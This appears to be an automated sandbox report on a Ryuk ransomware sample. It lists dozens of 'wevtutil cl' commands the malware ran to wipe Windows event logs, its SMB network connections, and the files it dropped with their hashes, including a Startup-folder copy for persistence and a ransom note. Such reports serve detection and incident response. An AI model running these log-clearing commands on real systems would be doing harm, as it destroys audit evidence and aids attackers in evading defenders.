wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-Admin/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-IPC/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AAD/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AAD/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ASN1/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ATAPort/General"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-All-User-Install-Agent/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AllJoyn/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AllJoyn/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppHost/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppHost/ApplicationTracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppHost/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppHost/Internal"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppID/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Deployment"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Execution"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Diagnostics"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppModel-State/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppModel-State/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppReadiness/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppReadiness/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppReadiness/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppSruProv"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Restricted"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Compatibility-Infrastructure-Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Trace"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Steps-Recorder"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AsynchronousCausality/Causality"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/GlitchDetection"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/Informational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/PlaybackManager"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Authentication/AuthenticationPolicyFailures-DomainController"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUser-Client"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserFailures-DomainController"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserSuccesses-DomainController"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BTH-BTHPORT/HCI"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BTH-BTHPORT/L2CAP"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BTH-BTHUSB/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BTH-BTHUSB/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BackgroundTransfer-ContentPrefetcher/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Backup"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Connections/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Resource-Flows/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Battery/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Biometrics/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BitLocker-Driver-Performance/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Management"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BitLocker/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bluetooth-BthLEPrepairing/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bluetooth-Bthmini/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bluetooth-Policy/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheMonitoring/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CAPI2/Catalog Database Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/ApartmentInitialize"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/ApartmentUninitialize"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/Call"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/CreateInstance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/ExtensionCatalog"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/FreeUnusedLibrary"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/RundownInstrumentation"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COMRuntime/Activations"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COMRuntime/MessageProcessing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-User/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Cleanmgr/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CloudStore/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CloudStore/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Containers-BindFlt/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Containers-BindFlt/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CoreApplication/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CoreApplication/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CoreApplication/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CoreWindow/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CoreWindow/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crashdump/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-BCRYPT/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-CNG/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/BackUpKeySvc"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-DSSEnh/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-NCrypt/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-RSAEnh/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DAMM/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DDisplay/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DDisplay/Logging"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DLNA-Namespace/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DSC/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DSC/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DSC/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DSC/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Data-Pdf/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/CrashRecovery"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Deduplication/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Deduplication/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Deduplication/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Deduplication/Scrubbing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Defrag-Core/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DesktopActivityModerator/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DesktopWindowManager-Diag/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceAssociationService/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceConfidence/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceGuard/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceGuard/Verbose"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Admin"

Network

Country  Destination          Domain  Proto
N/A      10.127.0.1:445               tcp
NL       154.61.71.51:445             tcp
N/A      10.127.0.1:139               tcp
NL       154.61.71.51:139             tcp
BE       8.238.110.126:80             tcp
US       13.89.179.10:443             tcp
BE       8.238.110.126:80             tcp
BE       8.238.110.126:80             tcp
BE       8.238.110.126:80             tcp
US       204.79.197.200:443           tcp

Files

memory/3956-132-0x0000000000000000-mapping.dmp

memory/4836-133-0x0000000000000000-mapping.dmp

memory/4860-134-0x0000000000000000-mapping.dmp

C:\ProgramData\ryuk.exe

MD5 a57e1e6fe1c98d2e75799a46e9eb5797
SHA1 7878e7042c355546c118a38b90d8f7221f74d8a4
SHA256 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe
SHA512 5764f3b1971f64c9d55f387524d92038350dbdf9a7195dc7e3f7b83760d93f45e73dd4c4af6cc597add838acd2d4a4e5b7a96a3444e3c8b0369b1d487621909d

memory/4976-136-0x0000000000000000-mapping.dmp

memory/3884-137-0x0000000000000000-mapping.dmp

memory/1292-138-0x0000000000000000-mapping.dmp

memory/620-139-0x0000000000000000-mapping.dmp

memory/4192-140-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

MD5 a57e1e6fe1c98d2e75799a46e9eb5797
SHA1 7878e7042c355546c118a38b90d8f7221f74d8a4
SHA256 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe
SHA512 5764f3b1971f64c9d55f387524d92038350dbdf9a7195dc7e3f7b83760d93f45e73dd4c4af6cc597add838acd2d4a4e5b7a96a3444e3c8b0369b1d487621909d

memory/4360-142-0x0000000000000000-mapping.dmp

memory/1252-143-0x0000000000000000-mapping.dmp

memory/4184-144-0x0000000000000000-mapping.dmp

memory/1676-145-0x0000000000000000-mapping.dmp

memory/4268-146-0x0000000000000000-mapping.dmp

memory/3428-147-0x0000000000000000-mapping.dmp

memory/2412-148-0x0000000000000000-mapping.dmp

memory/2344-149-0x0000000000000000-mapping.dmp

memory/1056-150-0x0000000000000000-mapping.dmp

memory/716-151-0x0000000000000000-mapping.dmp

memory/4936-152-0x0000000000000000-mapping.dmp

memory/2296-153-0x0000000000000000-mapping.dmp

memory/1832-154-0x0000000000000000-mapping.dmp

memory/2264-155-0x0000000000000000-mapping.dmp

memory/3892-156-0x0000000000000000-mapping.dmp

memory/3764-159-0x0000000000000000-mapping.dmp

C:\ProgramData\hrmlog1

MD5 c15b6fa7298d73deeb3fb9fb3eba83c4
SHA1 be9c8af07d3e78226cc893d15058116331d27ed1
SHA256 3c509a1592e7683d300d8eef7d7b941dcb22e035cc6f0d25835ce3c6edd23302
SHA512 8034be57b18aae34c3c784281f26e83a7645f07ee5ac3972ac750951a2fb0c81ba212cbfef9de6cc81b5bd905db139f168f16c09815db18e50fa24dcf0d818e2

C:\Users\Admin\AppData\Local\Temp\hrmlog1

MD5 c15b6fa7298d73deeb3fb9fb3eba83c4
SHA1 be9c8af07d3e78226cc893d15058116331d27ed1
SHA256 3c509a1592e7683d300d8eef7d7b941dcb22e035cc6f0d25835ce3c6edd23302
SHA512 8034be57b18aae34c3c784281f26e83a7645f07ee5ac3972ac750951a2fb0c81ba212cbfef9de6cc81b5bd905db139f168f16c09815db18e50fa24dcf0d818e2

memory/3948-160-0x0000000000000000-mapping.dmp

C:\ProgramData\hrmlog2

MD5 d80cc59347ae4e43809417a7120d75f5
SHA1 85934dbe2cec5c1d576a5e38b5e395534926dc9e
SHA256 7f1ee54ab577e083727b2be4efd3f76cd2f7b4e0d02489d90003b1bc2eb7eeb9
SHA512 ee73dec24aa6828f0af9020697468c031c08242a9b84252056e19c0463fe484a53413bafe9bda25085092eeca36871dee74b0bf063a900ff6b4ace89143c1ae4

C:\Users\Admin\AppData\Local\Temp\hrmlog2

MD5 d80cc59347ae4e43809417a7120d75f5
SHA1 85934dbe2cec5c1d576a5e38b5e395534926dc9e
SHA256 7f1ee54ab577e083727b2be4efd3f76cd2f7b4e0d02489d90003b1bc2eb7eeb9
SHA512 ee73dec24aa6828f0af9020697468c031c08242a9b84252056e19c0463fe484a53413bafe9bda25085092eeca36871dee74b0bf063a900ff6b4ace89143c1ae4

memory/3856-163-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\RYUKID

MD5 933d7ec82a73aca5dd0a05619e82e874
SHA1 f55dbc352e1dc285e514469d841f9eb371afb341
SHA256 cebf5d9b225cd17e012ea3a0e995fd1e6ef65edf18b7335769be7aee8e412c07
SHA512 2c8f76492a1c7caea0efa80614b89baff55748ea00c8191e646fdbe38acd3bed8dca69529c8ea3252930b414f56d99ff8df6223d8e128b22d69d2e12c75da3c0

memory/2996-167-0x0000000000000000-mapping.dmp

C:\ProgramData\hrmlog2

MD5 d80cc59347ae4e43809417a7120d75f5
SHA1 85934dbe2cec5c1d576a5e38b5e395534926dc9e
SHA256 7f1ee54ab577e083727b2be4efd3f76cd2f7b4e0d02489d90003b1bc2eb7eeb9
SHA512 ee73dec24aa6828f0af9020697468c031c08242a9b84252056e19c0463fe484a53413bafe9bda25085092eeca36871dee74b0bf063a900ff6b4ace89143c1ae4

C:\ProgramData\hrmlog1

MD5 c15b6fa7298d73deeb3fb9fb3eba83c4
SHA1 be9c8af07d3e78226cc893d15058116331d27ed1
SHA256 3c509a1592e7683d300d8eef7d7b941dcb22e035cc6f0d25835ce3c6edd23302
SHA512 8034be57b18aae34c3c784281f26e83a7645f07ee5ac3972ac750951a2fb0c81ba212cbfef9de6cc81b5bd905db139f168f16c09815db18e50fa24dcf0d818e2

C:\ProgramData\RYUKID

MD5 933d7ec82a73aca5dd0a05619e82e874
SHA1 f55dbc352e1dc285e514469d841f9eb371afb341
SHA256 cebf5d9b225cd17e012ea3a0e995fd1e6ef65edf18b7335769be7aee8e412c07
SHA512 2c8f76492a1c7caea0efa80614b89baff55748ea00c8191e646fdbe38acd3bed8dca69529c8ea3252930b414f56d99ff8df6223d8e128b22d69d2e12c75da3c0

memory/3772-170-0x0000000000000000-mapping.dmp

memory/824-169-0x0000000000000000-mapping.dmp

memory/4572-171-0x0000000000000000-mapping.dmp

C:\ProgramData\RyukReadMe.txt

MD5 23cb6bce418d720b600fb36625cea4df
SHA1 8f4018131e41187445688df8cbda01119efff157
SHA256 4ef805e48ac50fda04eeffff3a725481151dd1dccaf462c02105aa27f630e136
SHA512 18bd24abd2d55a288933d8b1ce363e5a92703c1c25758ce3d6e52a3b3a25b00d70194fa73520f819afa0080c09866235a22c5c5785ecea2ecd1b5feca36a66b5

memory/1164-173-0x0000000000000000-mapping.dmp

memory/1520-174-0x0000000000000000-mapping.dmp

memory/3556-175-0x0000000000000000-mapping.dmp

memory/2368-176-0x0000000000000000-mapping.dmp

memory/4100-177-0x0000000000000000-mapping.dmp

memory/948-178-0x0000000000000000-mapping.dmp

memory/3768-179-0x0000000000000000-mapping.dmp

memory/4212-180-0x0000000000000000-mapping.dmp

memory/2012-181-0x0000000000000000-mapping.dmp

memory/1424-182-0x0000000000000000-mapping.dmp

memory/620-183-0x0000000000000000-mapping.dmp

memory/3004-184-0x0000000000000000-mapping.dmp

